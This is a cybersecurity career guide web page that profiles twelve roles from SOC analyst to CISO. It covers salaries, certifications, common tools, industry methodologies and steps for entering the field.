Facebook X Instagram
Get in Touch
Subscribe

Cybersecurity intelligence delivered directly to your inbox.

By pressing the Subscribe button, you confirm that you have read and are agreeing to our Privacy Policy and Terms of Use
Subscribe
Facebook X Instagram
Career Guide
Updated 2026 · 15 min read

Build a career in cybersecurity.

Cybersecurity isn't one job — it's a constellation of specialties, each with its own tools, certifications, salary curve, and personality fit. This guide breaks down twelve real careers across offense, defense, governance, and engineering, so you can find the one that matches how you actually like to work.

Inside this guide
  • 12 detailed career profiles
  • Salary ranges by experience tier
  • Certifications that actually matter
  • Tools, methods, and skill maps
Career terminology
Blue Team

The defenders. SOC analysts, incident responders, threat hunters — anyone whose job is to stop, detect, or contain attacks.

Red Team

The authorized attackers. Pentesters and red teamers simulate adversaries to find weaknesses before real attackers do.

Purple Team

The bridge. Combines offensive and defensive expertise to improve detection by attacking and tuning together.

01 / The Market

Why this field, why now.

By the numbers

A persistent global talent shortage, six-figure entry-level salaries in many markets, and one of the lowest unemployment rates of any technical profession. The runway is real.

4.8M
Global cybersecurity workforce gap
ISC2 Workforce Study
32%
Projected job growth 2024–2034
US Bureau of Labor
$120K
Median US security analyst salary
BLS, 2024
0%
Effective unemployment in the field
CyberSeek
02 / The Roles

Twelve cybersecurity careers.

Filter by track

Each profile covers what the role does day-to-day, salary range, key certifications, core tools, and current market demand. Use the filters to narrow by track.

Blue Team · Entry

SOC Analyst

$65K–$95KUSD / Year

First line of defense. Triages alerts in a Security Operations Center, investigates suspicious activity, and escalates real incidents. The most common entry point into the field.

Certifications
Security+ CySA+ GCIA
Core Tools
Splunk Sentinel CrowdStrike Wireshark
Demand
95%
Blue Team · Mid

Incident Responder

$95K–$160KUSD / Year

When a breach is confirmed, IR takes over. Contains active threats, performs forensics, identifies the attack chain, and writes the post-mortem. High-pressure, high-reward.

Certifications
GCIH GCFA GCFE
Core Tools
Velociraptor FTK Volatility EnCase
Demand
88%
Blue Team · Mid

Threat Hunter

$110K–$170KUSD / Year

Proactively searches for adversaries that have evaded detection. Builds hypotheses from threat intel, queries telemetry, and turns findings into new detection rules.

Certifications
GCTI GCDA eCTHPv2
Core Tools
KQL ELK Stack MITRE ATT&CK Sigma
Demand
82%
Blue Team · Specialized

Malware Analyst

$120K–$190KUSD / Year

Reverse-engineers malicious code to understand its behavior, capabilities, and origin. Deeply technical — assembly, debugging, sandboxes — but produces game-changing intelligence.

Certifications
GREM eCMAP OSEE
Core Tools
IDA Pro Ghidra x64dbg Cuckoo
Demand
70%
Red Team · Mid

Penetration Tester

$90K–$160KUSD / Year

Authorized to break in. Conducts scoped engagements against networks, web apps, and infrastructure to find vulnerabilities — and writes reports clients can actually act on.

Certifications
OSCP PNPT CRTP
Core Tools
Burp Suite Metasploit Nmap BloodHound
Demand
90%
Red Team · Senior

Red Team Operator

$140K–$220KUSD / Year

Long-running adversary emulation. Goes beyond pentesting to mimic specific threat actors, evade detection, and test the blue team's response capabilities end-to-end.

Certifications
OSEP CRTO CRTL
Core Tools
Cobalt Strike Sliver Mythic Custom C2
Demand
75%
Red Team · Independent

Bug Bounty Hunter

$0–$500K+USD / Year

Independent researcher who finds vulnerabilities in public programs and earns per-find bounties. Wildly variable income, full schedule autonomy, only top performers earn well.

Specializations
Web Mobile API
Core Tools
HackerOne Bugcrowd Caido ffuf
Demand
65%
Engineering · Mid

Cloud Security Engineer

$130K–$200KUSD / Year

Secures workloads across AWS, Azure, and GCP. Hardens IAM, builds guardrails in IaC, configures CSPM tools, and works with developers to ship safely. One of the hottest specialties.

Certifications
AWS Sec CCSP GCSA
Core Tools
Terraform Wiz Prowler Kubernetes
Demand
98%
Engineering · Senior

Security Architect

$150K–$230KUSD / Year

Designs how security gets built into systems from the start. Threat models new products, defines reference architectures, and sets the standards engineering teams build against.

Certifications
CISSP-ISSAP SABSA TOGAF
Core Methods
STRIDE Zero Trust SASE PASTA
Demand
80%
Engineering · Mid

Application Security Engineer

$120K–$190KUSD / Year

Embedded with development teams to ship secure code. Reviews PRs, runs SAST/DAST/SCA, threat models features, and trains developers. Bridge between dev and security.

Certifications
CSSLP GWAPT OSWE
Core Tools
Semgrep Snyk Checkmarx OWASP ZAP
Demand
92%
Governance · Entry to Senior

GRC Analyst

$80K–$160KUSD / Year

Governance, Risk, Compliance. Maps controls to frameworks, runs audits, manages vendor risk, and writes the policies that keep regulators satisfied. Less technical, more strategic.

Certifications
CISA CRISC ISO 27001 LA
Frameworks
NIST CSF SOC 2 PCI DSS HIPAA
Demand
85%
Leadership · Executive

CISO / Security Director

$200K–$500K+USD / Year

Owns security strategy at the executive level. Reports to the CEO or board, manages budget and headcount, balances risk against business outcomes. Less hacking, more leading.

Certifications
CISSP CISM MBA
Core Skills
Risk Mgmt Board Reporting Budget Hiring
Demand
78%
03 / Compensation

Salary by role, US median.

2025 Data

Median base compensation for senior-level positions in the United States. International markets vary — UK and EU typically run 30–40% lower, while top-tier tech hubs (Bay Area, NYC) often run 20–30% higher.

SOC Analyst
$80KMedian
GRC Analyst
$120KMedian
Penetration Tester
$125KMedian
Incident Responder
$130KMedian
AppSec Engineer
$155KMedian
Threat Hunter
$140KMedian
Cloud Security Engineer
$165KMedian
Malware Analyst
$160KMedian
Red Team Operator
$180KMedian
Security Architect
$190KMedian
CISO
$310KMedian
04 / The Credentials

Certifications worth your time.

By tier

Certifications won't get you hired alone, but the right ones open doors and prove baseline competence. Here are the credentials that consistently appear in job postings across all tiers.

Tier 01 / Foundation

Entry-level certs

Start here · 0–2 years
CompTIA Security+
~$4003 yr renewal
The default starting point. Covers fundamentals and is required for many US government roles. Vendor-neutral and widely recognized.
ISC2 CC
Free exam3 yr renewal
Certified in Cybersecurity. The newest entry-level cert, currently free for the first million candidates. Good resume signal.
CompTIA Network+
~$3703 yr renewal
Networking is the foundation of all security work. If you're weak on subnets, routing, and protocols, take this first.
Tier 02 / Specialist

Mid-level certs

Specialize · 2–5 years
OSCP
~$1,600Lifetime
Offensive Security Certified Professional. The gold standard for pentesters — a 24-hour hands-on hacking exam, not multiple choice.
CySA+ / GCIH
$400 / $9803–4 yr renewal
Defensive analyst certs. CySA+ is more accessible; GCIH (SANS) is deeper and far more respected, but expensive.
AWS / Azure Security
~$3003 yr renewal
Cloud security is exploding. AWS Security Specialty and Microsoft SC-100 are the two most-requested cloud security credentials.
Tier 03 / Senior

Advanced certs

Lead · 5+ years
CISSP
~$7503 yr renewal
The management-track default. Required by many senior and director-level postings. Requires 5 years of verifiable experience.
OSEP / OSEE
~$1,800Lifetime
Elite offensive certs from Offensive Security. OSEE is among the hardest exams in the industry — and a clear differentiator.
CISM / CRISC
~$7603 yr renewal
For governance and risk leadership. ISACA's flagship credentials, frequently required for audit, compliance, and CISO roles.
05 / The Toolkit

Tools of the trade.

By category

The tools cybersecurity professionals reach for daily, organized by function. Most are free or have generous community editions — install them, learn them, list them on your resume.

SIEM & Logs
  • Splunk
  • Microsoft Sentinel
  • Elastic Security
  • Wazuh
  • Graylog
Endpoint / EDR
  • CrowdStrike Falcon
  • SentinelOne
  • Microsoft Defender
  • Velociraptor
  • OSQuery
Offensive
  • Burp Suite
  • Metasploit
  • Cobalt Strike
  • BloodHound
  • Mimikatz
Network Recon
  • Nmap
  • Wireshark
  • Masscan
  • Zeek
  • Suricata
Forensics & DFIR
  • Autopsy
  • Volatility
  • FTK Imager
  • KAPE
  • Plaso
Reverse Engineering
  • Ghidra
  • IDA Pro
  • Binary Ninja
  • x64dbg
  • Radare2
Cloud Security
  • Wiz
  • Prowler
  • ScoutSuite
  • CloudSploit
  • Pacu
AppSec
  • Semgrep
  • Snyk
  • OWASP ZAP
  • Trivy
  • Checkmarx
06 / The Playbook

How professionals actually work.

Methodologies

Five methodologies you'll encounter across virtually every cybersecurity role. Knowing them by name — and what they're for — makes you immediately legible to hiring managers.

01
PTES — Penetration Testing Execution Standard
Seven-phase methodology used by pentesters: pre-engagement, recon, threat modeling, vuln analysis, exploitation, post-exploitation, reporting. The de facto standard for engagement structure.
Pentesting Red Team
02
MITRE ATT&CK — Adversarial Tactics & Techniques
An exhaustive matrix of every known attacker behavior, organized by tactic. Defenders use it to map detection coverage; red teams use it to plan emulation. Universal reference.
Detection Red Team Threat Intel
03
NIST CSF — Cybersecurity Framework
Identify, Protect, Detect, Respond, Recover. The most widely adopted risk-based framework in the world. GRC, architects, and CISOs all speak this language.
GRC Architecture Strategy
04
STRIDE — Threat Modeling
Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege. Microsoft's classic framework for finding threats during design — still the go-to.
Architecture AppSec
05
NIST IR 800-61 — Incident Response
Preparation, Detection & Analysis, Containment, Eradication & Recovery, Post-Incident. The standard IR lifecycle every responder works against.
IR SOC Forensics
07 / Skill Map

Technical vs. soft skills.

By weight

A breakdown of the skills that matter across most cybersecurity roles, weighted by how much hiring managers actually care about them.

Technical Skills
Networking & Protocols 95%
Linux Administration 90%
Scripting (Python / Bash) 85%
Cloud Platforms 85%
Active Directory 80%
Reverse Engineering 50%
Soft Skills
Written Communication 95%
Analytical Thinking 95%
Curiosity & Self-Learning 95%
Calm Under Pressure 85%
Cross-Team Collaboration 80%
Business Acumen 70%
08 / The Path In

Five steps to your first role.

Start to offer

No degree required. No prior experience required. Follow these five steps in order — most people complete the path in 6 to 18 months alongside other commitments.

Step 01
Build foundations
Learn networking, Linux, and basic scripting. Free resources: Professor Messer, OverTheWire Bandit, Linux Journey.
Step 02
Pick a track
Defense, offense, governance, engineering. Try TryHackMe paths to feel which clicks before committing time and money.
Step 03
Get one cert
Security+ for most paths. eJPT or PNPT for offense. CC if budget is tight. The point is the discipline of finishing.
Step 04
Build a portfolio
Lab writeups on a personal blog. CTF participation. A home lab. Visible proof of work beats any line on a resume.
Step 05
Apply broadly
Junior SOC roles, helpdesk-to-security, internships, MSSPs. First job is hardest — second one comes much faster.

Not sure which track is right for you?

Take our 2-minute career fit quiz — get matched with the cybersecurity role that fits how you actually like to work.

Take Quiz
Find your fit. Build your craft.
12 roles 2026 edition ~15 min read